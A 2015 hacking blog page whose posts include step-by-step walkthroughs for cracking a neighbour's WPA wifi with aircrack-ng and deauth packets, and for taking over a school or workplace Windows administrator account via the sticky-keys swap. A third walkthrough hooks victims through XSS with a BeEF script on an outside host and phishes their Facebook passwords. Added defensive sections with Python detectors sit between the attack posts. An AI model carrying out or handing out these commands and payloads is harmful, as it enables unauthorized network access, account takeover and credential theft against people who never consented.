
Friday, 27 February 2015

HOW TO FIND ANDROID PHONE IF LEFT IN SILENT MODE

I think we all know it is very difficult to find your phone when it is left in silent mode. Most of us start making calls, although that doesn’t make any sense if vibration mode is also off. Now I am going to tell you a better way to find your Android device if it is left in silent mode.
You have to use Google’s official Android Device Manager to locate your phone. Here are the simple steps:
  1. Go to Android Device Manager by Google in your desktop browser; follow the link HERE.
  2. Log in with the same Gmail account you used for the Google Play Store.
  3. Now you will see your device name and last login date. You will also see three options: Ring, Lock and Erase.
  4. By clicking on Ring, your device starts ringing at high volume, which helps you find your phone in seconds. This function works even when your phone is in silent mode.
  5. You can also Lock your phone with a password if you have lost your device. You have to input a message and a number so that whoever finds your phone can call you back at that number (but nowadays no one is that nice).
  6. If the Location services option on your device is turned on, you can find the exact location of the device by clicking on the locate service, which is at the right side of the device name.
  7. You can also delete all the data by clicking on Erase. It’ll perform a factory reset on your device. Your apps, photos, music, settings and everything else will be deleted immediately. After you erase the device, Android Device Manager will no longer work. The factory reset will start automatically when your device is online.

Tuesday, 24 February 2015

LEARN HOW TO HACK WIFI IN MOST EASY WAY

In this tutorial, I’m going to tell you how to hack wifi. Now, given that we have Kali Linux, open up a terminal window and type “ifconfig”. This is going to list all the networking interfaces connected to your device.
Here, we need wlan0, which is our wifi card. So we will disable the others by typing “ifconfig <name of interface> down”.
Now we will type “airmon-ng start wlan0”.
(airmon-ng is a tool for monitoring air traffic, “start” basically starts the tool, and “wlan0” specifies the interface we are using for monitoring)
It’ll probably show “some processes that could cause trouble”; we’ll simply kill those processes by typing “kill <process ID>”.
Now if we type “ifconfig”, it will only show the monitoring mode interface “mon0”.
Then type “airodump-ng mon0”.
In the screenshot below, the highlighted bssid is our target (and it is my own); the channel is 13, as we can see in the “CH” column.
In the next step we will type “airodump-ng -c <channel> -w <name> --bssid <bssid> mon0”.
Let me tell you a few things here: “airodump-ng” is a tool for capturing Wi-Fi packets, “<channel>” means the channel your target is running on, “-w” basically writes a file by the name that follows it in “<name>” (I used “handshake” just for the convenience of it), and bssid is a string of numbers specific to a hotspot.
Then open up a new terminal and type “aireplay-ng -0 0 -a <bssid> mon0”. This command sends a deauthentication signal (usually called a deauth packet) to all the devices connected to that hotspot. After a few moments, stop it with “Ctrl+C”. Now, as we can see, the other terminal shows that the WPA handshake was successfully captured.
We will close both windows at this point, and open a new one. Type “ls”; that should list the files in the current directory. We can clearly see that the files from the above operation are present. But we only need the file ending with “-01.cap”.
Then open a new terminal and type “aircrack-ng -w <full location of the wordlist> <the file name>”. Remember that the file name will end with .cap.
You may be asking what wordlist? What is that sh*t?
A wordlist is a file containing thousands of known and possible passwords, which you can download from the internet. The one I used can be found here. The list contains exactly 982,963,904 words, all optimized for WPA/WPA2. I would also just like to point out that this is not my work; I got it from forums.hak5.org. It was a guy who compiled a whole load of useful lists, including his own, to come up with 2 lists (one is 11gb and one is 2gb). I will be seeding this torrent indefinitely since it is shareware and it's awesome!
It will then start matching keys in the word list. The time it takes depends completely on the strength of the password. The stronger the password, the more time it will take.
After completion it looks something like the screenshot below. In it, you can see that it tested 45688 keys and my key was the 45689th.
Now you can use this password on that wifi network and enjoy. This tutorial is completely for educational purposes. For further tricks, tips and news from the world of technology and hacking, stay tuned to hackaklash.blogspot.com
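
From the network owner's side, the deauthentication run described above is visible on the air. The following is an added example, not part of the original post: a small detector that flags a burst of deauth frames aimed at one BSSID. The frame records, MAC addresses, window and threshold are constructed assumptions.

```python
from collections import defaultdict, deque

def sample_frames():
    """Constructed management-frame records: (time_s, subtype, bssid, destination)."""
    frames = [(10.0, "deauth", "aa:bb:cc:00:00:02", "aa:bb:cc:11:22:33"),
              (70.0, "deauth", "aa:bb:cc:00:00:02", "aa:bb:cc:11:22:44"),
              (99.0, "beacon", "aa:bb:cc:00:00:01", "ff:ff:ff:ff:ff:ff")]
    # A continuous broadcast deauth run against one BSSID, 20 frames per second.
    frames += [(100.0 + i * 0.05, "deauth", "aa:bb:cc:00:00:01", "ff:ff:ff:ff:ff:ff")
               for i in range(40)]
    return frames

def detect_deauth_bursts(frames, window=5.0, threshold=10):
    """Return {bssid: peak}, where peak is the largest number of deauth frames
    seen for that BSSID inside any `window`-second span, if it reaches `threshold`."""
    recent = defaultdict(deque)   # bssid -> timestamps still inside the window
    peaks = {}
    for ts, subtype, bssid, _dst in sorted(frames):
        if subtype != "deauth":
            continue
        q = recent[bssid]
        q.append(ts)
        while ts - q[0] > window:   # drop timestamps that fell out of the window
            q.popleft()
        if len(q) >= threshold:
            peaks[bssid] = max(peaks.get(bssid, 0), len(q))
    return peaks

if __name__ == "__main__":
    for bssid, peak in detect_deauth_bursts(sample_frames()).items():
        print(f"ALERT {bssid}: {peak} deauth frames within 5 s")
```

Two isolated deauth frames a minute apart stay below the threshold, while the continuous run is reported. Enabling 802.11w Protected Management Frames on the access point makes clients ignore forged deauth frames, and a long passphrase that appears in no wordlist defeats the dictionary step.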

Saturday, 14 February 2015

HOW TO BREAK IN ANY ADMINISTRATOR ACCOUNT ON ANY WINDOWS SYSTEM

Have you forgotten your Windows password and been locked out? Don't worry, we will be helping you to successfully log in to your administrator account.


Once you get to this screen, hold the power button until the computer turns off.


If you have done it correctly, you will get this type of screen. If not, then try again or select Launch Startup Repair.


Let the repair process continue. If you get this type of window, click 'Cancel'.


When you get this window, click on "show problems", scroll down and click the last link. Notepad will pop up.



Then go to file/open and double click on the disk in which you have your windows installed.


Now go to windows/system32. Now do exactly what I say, or you might damage the computer. Under “Files of type,” select “All files.” Scroll down and find “cmd,” then make a copy of “cmd” in the same folder in which “cmd” is located. You will get a file named “cmd – Copy” or something like that.

Now find “sethc” in the same folder. This file executes sticky keys. Rename it to “sethc1”.

Now rename your “cmd – Copy” to “sethc.” Close notepad, and hit “Finish” to shut down your system, or just restart it manually.



Once you get back to the login screen (where it says “Press Control – Alt – Delete.” Ignore my background, I don’t have that enabled), press “Shift” 5 times to open up the command prompt.
Next, we need to find out which user is the local administrator for this PC. To do this, type “net localgroup Administrators” and look for any administrator that does not have your school/work domain in front of it, followed by a “/.” As you can see, one of the admins is named “qwaszx.” You will probably see a name like this, since schools/workplaces tend to make it a random string of letters and/or numbers to keep people from getting into it.

Now, we need to change that account’s password. Type “net user <ACCOUNT NAME HERE> *” and type the new password twice. It will not show what you’re typing, but your keystrokes are being registered. You can now log in to your admin account. However, schools/workplaces also like to disable the admin account you just changed the password for, so you might not be able to log in. There is a simple fix. If you get that message, then do the extra step.

If the admin account is disabled, type “net user <ACCOUNT NAME HERE> /active:yes”. You will now be able to log in.



Now enjoy; you have full rights to use it.
WARNING: we will not be held responsible for any misuse. It is purely for educational purposes.
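
For administrators, the swap described above leaves a simple trace: the sticky keys program becomes byte-identical to the command shell. The following is an added example, not part of the original post, that compares hashes of the programs Windows can start from the logon screen against cmd.exe. It goes beyond the post by covering the other accessibility programs as well as sethc; the sample directory and its file contents are constructed placeholders.

```python
import hashlib
import tempfile
from pathlib import Path

# Programs Windows can start from the logon screen before anyone signs in.
ACCESSIBILITY = ["sethc.exe", "utilman.exe", "osk.exe",
                 "magnify.exe", "narrator.exe", "displayswitch.exe"]
SHELLS = ["cmd.exe"]

def sha256_of(path):
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()

def find_replaced_binaries(system32):
    """Return [(accessibility_exe, shell_exe)] for every accessibility program
    whose bytes are identical to a command shell in the same directory."""
    system32 = Path(system32)
    shell_hashes = {sha256_of(system32 / s): s
                    for s in SHELLS if (system32 / s).is_file()}
    findings = []
    for name in ACCESSIBILITY:
        target = system32 / name
        if target.is_file() and sha256_of(target) in shell_hashes:
            findings.append((name, shell_hashes[sha256_of(target)]))
    return findings

def build_sample_dir(tampered):
    """Constructed stand-in for System32 (placeholder bytes, not real binaries)."""
    root = Path(tempfile.mkdtemp())
    (root / "cmd.exe").write_bytes(b"constructed cmd bytes")
    (root / "utilman.exe").write_bytes(b"constructed utilman bytes")
    sethc = b"constructed cmd bytes" if tampered else b"constructed sethc bytes"
    (root / "sethc.exe").write_bytes(sethc)
    if tampered:  # the renamed original, as in the steps above
        (root / "sethc1.exe").write_bytes(b"constructed sethc bytes")
    return root

if __name__ == "__main__":
    print(find_replaced_binaries(build_sample_dir(tampered=True)))
```

On a real machine the function is pointed at the Windows system directory. A hash match only catches a straight copy of the shell, so it complements rather than replaces file-integrity monitoring of that directory.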











Thursday, 12 February 2015

HACKING SOCIAL MEDIA SITES USING BEEF

The best tool I’ve seen to be used with different XSS attacks is called the BeEF Exploitation
Framework. If you do find a valid XSS on a site, you will need to craft your XSS findings to utilize the BeEF Framework.
Starting BeEF Commands:

1. cd /usr/share/beef-xss
2. ./beef



Let’s log into the console UI after the BeEF server has started. As we see from the image above, the
UI URL in this case is located at http://127.0.0.1:3000/ui/authentication. We can open a browser and
go to that URL.



If we look at the image where we loaded BeEF via command line, we saw both a URL
for the UI page and the hook page (Hook URL). Let’s take a quick second and review the hook page
(hook.js).



Although this JavaScript has been well obfuscated, this is the payload that will control the victim user
and will be injected into the victim browser’s page. Once injected, their browser will connect back
into your central server and the victim will be unaware.

So if we have located an XSS vulnerability on a page, we can now use BeEF to help with the exploitation of the end user. In our initial example, http://securepla.net/xss_example/example.php?alert=, the alert variable takes any input and presents it to the end user. We can manually add our JavaScript code here and send the link to our unsuspecting user. In the example below, I print out the user’s DOM cookies using the JavaScript code:

<script>alert(document.cookie)</script>



This proves that the end user does process the JavaScript code embedded from our query. To create a successful exploit, instead of printing the cookies, we are going to craft a URL that uses JavaScript to include the hook.js file. It will look something like: http://securepla.net/xss_example/example.php?alert=asda<script src=http://192.168.10.91:3000/hook.js></script>. I was able to append the hook.js script by using the JavaScript code:

<script src=[URL with hook.js]></script>
Remember that if this is done on a public site then the URL will need to be pointing to a public
address hosting the hook.js page and listening service.

Once you trick a victim into going to that URL using social engineering tactics, they will be part of your
XSS zombie network. Going back to our UI panel, we should now see a victim has joined our server.




With an account hooked, there are many different modules within BeEF to exploit the end user. As seen
in the image above, you can try to steal stored credentials, get host IP information, scan hosts
within their network, and so much more.


One of my favorite attacks is called “petty theft” because of how simple it is. Drop down to Social
Engineering folder and to Petty Theft. Configure how you want it, in this case we’ll use the Facebook
example, and hit execute. Remember the IP for the custom logo field has to be your BeEF IP. This is
so the victim can grab the image from your server.




After the attacker clicks submit, on the victim’s system a Facebook password prompt will pop up.
This is where you can get creative in targeting your users and use a popup that they would most likely
enter. If you are looking to gain Google accounts, there is also a Google Phishing module. The
purpose of this client side attack is that they are unaware that they are part of this zombie network and
the password prompt should seem like it is not out of the ordinary.



After the unsuspecting victim types in their password, go back to the UI to find your loot. Clicking on
the id 0 will show the attacker what the victim typed into that box. This should be enough to start
gaining some access as the user and move laterally throughout the environment.



I hope I was able to demonstrate how powerful an XSS vulnerability can be.
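
The reflected request used above is easy to spot in web server logs. The following is an added example, not part of the original post: it scans access-log lines for query parameters that carry a script tag and reports any external script source. The log lines and client addresses are constructed; the path, parameter and hook URL are the ones from the post.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
SCRIPT_TAG = re.compile(r"<\s*script\b[^>]*>", re.I)
SRC_ATTR = re.compile(r"""src\s*=\s*["']?([^\s"'>]+)""", re.I)

def sample_log():
    """Constructed access-log lines for the example.php page from the post."""
    base = '[12/Feb/2015:10:00:0%d +0000] "GET /xss_example/example.php?alert=%s HTTP/1.1" 200 512'
    values = ["hello",
              "asda%3Cscript%20src%3Dhttp%3A%2F%2F192.168.10.91%3A3000%2Fhook.js%3E%3C%2Fscript%3E",
              "%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E",
              "%253Cscript%253Ealert(1)%253C%252Fscript%253E"]  # double-encoded
    return ["10.0.0.%d - - " % (i + 5) + base % (i, v) for i, v in enumerate(values)]

def find_reflected_script_params(log_lines):
    """Return [(line_no, parameter, script_src_or_None)] for each script tag
    found in a decoded query-string value."""
    findings = []
    for line_no, line in enumerate(log_lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        query = urlsplit(match.group(1)).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            decoded = unquote(value)   # second decode catches double encoding
            for tag in SCRIPT_TAG.finditer(decoded):
                src = SRC_ATTR.search(tag.group(0))
                findings.append((line_no, name, src.group(1) if src else None))
    return findings

if __name__ == "__main__":
    for finding in find_reflected_script_params(sample_log()):
        print(finding)
```

The fix on the application side is to HTML-encode the alert parameter before writing it into the page. A Content-Security-Policy that restricts script sources also stops the browser from loading a script from another host.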









Friday, 6 February 2015

Here is a video showing you how to bypass the lockscreen of an iPhone 5S and get access to some of the features such as the user's saved photos and videos.